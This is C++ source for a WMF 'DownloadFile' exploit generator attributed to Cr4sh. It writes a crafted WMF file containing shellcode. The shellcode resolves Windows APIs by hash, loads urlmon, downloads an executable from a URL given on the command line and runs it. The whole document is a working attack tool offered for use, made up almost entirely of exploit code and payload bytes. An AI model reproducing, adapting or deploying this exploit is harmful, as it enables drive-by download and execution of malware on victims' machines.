[php]
/****************************************
* *
* WMF DownloadFile exploit by Cr4sh *
* www.cr4sh.h15.ru *
* *
****************************************/
#include <iostream>
#include <tchar.h>
#include <windows.h>
#define FNAME "exploit.wmf"
typedef BYTE uchar;
static uchar header[] =
{
0x01,0x00,0x09,0x00,0x00,0x03,0xED,0x00
,0x00,0x00,0x06,0x00,0x3D,0x00,0x00,0x00
,0x00,0x00,0x11,0x00,0x00,0x00,0x26,0x06
,0x09,0x00,0x16,0x00
};
static uchar sc[]=
{
0xe9,0xcc,0x00,0x00,0x00,0x5f,0xe8,0x56
,0x00,0x00,0x00,0x89,0xc3,0x50,0x68,0x8e
,0x4e,0x0e,0xec,0xe8,0x60,0x00,0x00,0x00
,0x31,0xc9,0x66,0xb9,0x6f,0x6e,0x51,0x68
,0x75,0x72,0x6c,0x6d,0x54,0xff,0xd0,0x50
,0x68,0x36,0x1a,0x2f,0x70,0xe8,0x46,0x00
,0x00,0x00,0x31,0xc9,0x51,0x51,0x8d,0x37
,0x56,0x8d,0x77,0x08,0x56,0x51,0xff,0xd0
,0x53,0x68,0x98,0xfe,0x8a,0x0e,0xe8,0x2d
,0x00,0x00,0x00,0x51,0x57,0xff,0xd0,0x31
,0xc9,0x49,0x90,0x90,0x53,0x68,0x7e,0xd8
,0xe2,0x73,0xe8,0x19,0x00,0x00,0x00,0xff
,0xd0,0x55,0x56,0x64,0xa1,0x30,0x00,0x00
,0x00,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad
,0x8b,0x68,0x08,0x89,0xe8,0x5e,0x5d,0xc3
,0x53,0x55,0x56,0x57,0x8b,0x6c,0x24,0x18
,0x8b,0x45,0x3c,0x8b,0x54,0x05,0x78,0x01
,0xea,0x8b,0x4a,0x18,0x8b,0x5a,0x20,0x01
,0xeb,0xe3,0x35,0x49,0x8b,0x34,0x8b,0x01
,0xee,0x31,0xff,0xfc,0x31,0xc0,0xac,0x38
,0xe0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7
,0xeb,0xf2,0x3b,0x7c,0x24,0x14,0x75,0xe1
,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c
,0x4b,0x8b,0x5a,0x1c,0x01,0xeb,0x8b,0x04
,0x8b,0x01,0xe8,0xe9,0x02,0x00,0x00,0x00
,0x31,0xc0,0x89,0xea,0x5f,0x5e,0x5d,0x5b
,0xc3,0xe8,0x2f,0xff,0xff,0xff,0x6d,0x68
,0x68,0x2e,0x65,0x78,0x65,0x00
};
static uchar end[] =
{
0x03,0x00,0x00,0x00,0x00,0x00
};
int _tmain(int argc, _TCHAR* argv[])
{
char *fname = argv[1];
printf("\n WMF download file exploit by Cr4sh\n"
" www.cr4sh.h15.ru\n"
" —————————————-\n");
if (argc < 2) {
printf(" USSAGE: \n"
" exploit.exe http://example.com/somefile.exe\n");
return 0;
}
PMETAHEADER mh = (PMETAHEADER)&header;
PMETARECORD mr = (PMETARECORD)(header + sizeof(METAHEADER));
mh->mtSize = (sizeof(header) + sizeof(sc) + sizeof(end) + strlen(fname)) / 2;
printf(" HEADER \n"
" FileType : 0x%.4x\n"
" HeaderSize : 0x%.4x\n"
" FileSize : 0x%.8x\n"
" METARECORD \n"
" Size : 0x%.8x\n"
" Function : 0x%.4x\n",
mh->mtType, mh->mtHeaderSize, mh->mtSize, mr->rdSize, mr->rdFunction);
HANDLE hf = CreateFile(FNAME, GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
DWORD written = 0;
WriteFile(hf, (LPCVOID)header, sizeof(header), &written, NULL);
WriteFile(hf, (LPCVOID)sc, sizeof(sc), &written, NULL);
WriteFile(hf, fname, strlen(fname), &written, NULL);
WriteFile(hf, (LPCVOID)end, sizeof(end), &written, NULL);
CloseHandle(hf);
printf(" Done, saved in %s\n", FNAME);
return 0;
}
[/php]